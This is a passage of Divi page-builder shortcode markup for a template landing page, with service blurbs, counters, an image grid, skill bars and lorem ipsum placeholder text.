column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\" column_structure=\"1_4,1_4,1_4,1_4\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" 